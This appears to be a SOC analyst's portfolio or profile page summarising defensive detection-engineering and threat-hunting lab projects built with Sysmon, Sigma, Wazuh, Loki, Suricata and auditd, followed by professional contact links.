SOC Analyst • Detection Engineering • Threat Hunting

Focused on bridging the gap between adversary behavior and defensive investigation. I build detection pipelines and adversary emulation labs to master the how and why behind modern cyberattacks.

Key Outcome: Conducted manual threat hunting across Sysmon event logs to reconstruct process execution chains (cmd.exe → powershell.exe → rundll32.exe) and authored custom Sigma detections for Living-off-the-Land techniques.
The Stack: Atomic Red Team, Sysmon, Sigma, Hayabusa.

Key Outcome: Developed a workflow to convert platform-agnostic Sigma rules into production-ready Wazuh detections for both Windows and Linux telemetry.
The Stack: Sigma, Wazuh XML Rules, Docker, wazuh-logtest

Key Outcome: Reconstructed the attacker’s activity timeline by correlating auth.log and auditd telemetry, mapping events to MITRE ATT&CK techniques T1110 and T1078.
The Stack: Wazuh SIEM, Docker, Linux Auditd.

Key Outcome: Designed a log ingestion and analysis workflow using LogQL to detect SSH brute-force attempts and suspicious sudo activity in real time.
The Stack: Promtail, Loki, Grafana.

Suricata-IDS: Deployed and configured Suricata to detect network reconnaissance activity, analyzing EVE.json telemetry generated from simulated Nmap scans.

Auditd-Watch: Implemented Linux audit rules to monitor sensitive files and privilege escalation attempts, analyzing kernel-level events for forensic investigation.

Wazuh-SIEM: Integrated Linux audit telemetry into Wazuh and configured log ingestion to generate security alerts, enabling investigation of privileged command execution.

• 👤 LinkedIn: in/tanyapriyaofficial
• 🌐 Portfolio: tanya-priya.github.io
• 📧 Email: tanya.priya.blue@gmail.com

  "Visibility is the first step toward defense."